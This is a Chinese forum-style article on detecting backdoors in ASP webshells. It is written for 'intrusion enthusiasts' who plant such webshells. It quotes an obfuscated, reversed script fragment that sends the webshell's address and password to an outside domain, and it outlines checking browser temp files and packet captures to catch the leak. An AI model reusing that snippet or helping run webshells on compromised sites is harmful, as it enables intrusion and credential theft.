当前位置:站长防黑网防黑文章防黑文章网站安全

文章正文

ASP木马后门检测的两种方法

减小字体 增大字体 作者:佚名  来源:本站整理  发布时间:2012-11-09 13:24:48
作为一个入侵爱好者,你是否想到过自己辛苦入侵后留下的ASP木马会是有后门的呢?今天我们就来看看如何查找ASP木马的后门,方法超级简单。
首先用解密工具将加密的ASP木马解密,再用文本方式打开解密后的ASP木马,仔细查找,发现一处“&prevres&╁=p&╁&urevres&╁=u&2=da?/da/moc.ecc8//:ptth=crs tpircs<╁SRR"”代码,如图1所示。
 
图1
先不管它,我把ASP木马登录密码设置成344566921,上传到网站上,登录ASP木马之后,打开Cookies临时文件夹,能看到刚才访问的ASP文件边上多出了几个文件,如图2所示。打开第二文件后,你会发现这是一个后门,如图3所示,ASP地址和密码都被记录了。就这样,自己辛苦的劳动被人不劳而获了。
 
图2
 
图3
我们登录ASP木马后,查看源文件也能找到上面被记录的ASP木马的地址和密码,如图4所示。
 
图4
大家可以用这种方法试试自己使用的ASP木马是否有后门。我在自己的网站上使用了这个ASP木马做测试之后,我的站就被挂马了。在看了黑防2007年第10期《隐藏的艺术》一文后,才有了今天这篇文章,由此让我有了一个思路,那就是不知道自己的ASP木马是否有后门时,就在自己的ASP木马上增加一段统计代码,自己访问的地址是可以知道的,如果是其他的IP访问了这个ASP木马,那就要小心了,恐怕要有后门。这是本人的笨方法,但个人认为有一定的效果

2、我看了孤独的检测 发现孤独检查出来的后门并不是抓包出来的。所以我就试了一下。。

原来是看IE临时文件的

首先清空临时的

汗直接看图吧

 

二、抓包查可疑网址,不详谈

 

温馨提示:您正在浏览的是来自站长防黑网收集的文章【ASP木马后门检测的两种方法

Tags:

好的评价 如果您觉得此文章好,就请您
  0%(0)
差的评价 如果您觉得此文章差,就请您
  0%(0)

文章评论

文章评论 评论内容只代表网友观点,与本站立场无关!
   评论摘要(共 0 条,得分 0 分,平均 0 分) 查看完整评论
网站首页 关于本站 网站帮助 广告合作 联系我们 免责申明 网站地图  ©2010- zzfhw.com . All rights reserved. 站长防黑网 版权所有